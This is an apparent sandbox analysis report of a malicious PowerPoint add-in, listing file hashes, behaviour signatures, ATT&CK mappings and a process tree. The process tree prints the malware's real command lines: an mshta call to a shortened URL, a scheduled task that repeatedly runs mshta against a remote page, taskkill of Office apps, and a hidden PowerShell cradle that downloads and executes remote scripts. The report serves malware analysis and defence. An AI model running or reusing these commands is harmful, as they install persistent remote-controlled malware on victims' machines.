Overview

overview

10

Static

static

1.ppam

windows7_x64

10

1.ppam

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    18-10-2021 09:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1.ppam

  • Size

    11KB

  • MD5

    e5a35f8c565ddea415804d4b05244e28

  • SHA1

    47d030e20b324c3706d652b2a562a61547e14fbd

  • SHA256

    22da4275847d5be9f1d21df99c3f51be09d31be7942940732d311b030c62eeb0

  • SHA512

    022d032f791e30e19a4c82a4e17cacaf238618c0f635bb94e747d7769093da575b2577fe95174d7b747b29909232d69df1a7135d9e3db640de947ce9dc21ffdf

Score
10/10
persistence

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 15 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\1.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:552
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksodksueasdweu
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:676
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1768
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/1.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1576
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1504

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/552-58-0x0000000000000000-mapping.dmp
      Download
    • memory/552-60-0x000007FEFBB21000-0x000007FEFBB23000-memory.dmp
      Filesize

      8KB

      Download
    • memory/676-63-0x0000000000000000-mapping.dmp
      Download
    • memory/1500-59-0x0000000076431000-0x0000000076433000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1500-55-0x0000000074071000-0x0000000074075000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1500-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1500-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1500-56-0x0000000071311000-0x0000000071313000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1504-67-0x0000000000000000-mapping.dmp
      Download
    • memory/1504-70-0x00000000025A0000-0x00000000031EA000-memory.dmp
      Filesize

      12.3MB

      Download
    • memory/1504-69-0x00000000025A0000-0x00000000031EA000-memory.dmp
      Filesize

      12.3MB

      Download
    • memory/1504-71-0x00000000025A0000-0x00000000031EA000-memory.dmp
      Filesize

      12.3MB

      Download
    • memory/1576-66-0x0000000000000000-mapping.dmp
      Download
    • memory/1768-64-0x0000000000000000-mapping.dmp
      Download
    • memory/1780-61-0x0000000000000000-mapping.dmp
      Download
    • memory/1780-65-0x0000000004D70000-0x0000000004DBC000-memory.dmp
      Filesize

      304KB

      Download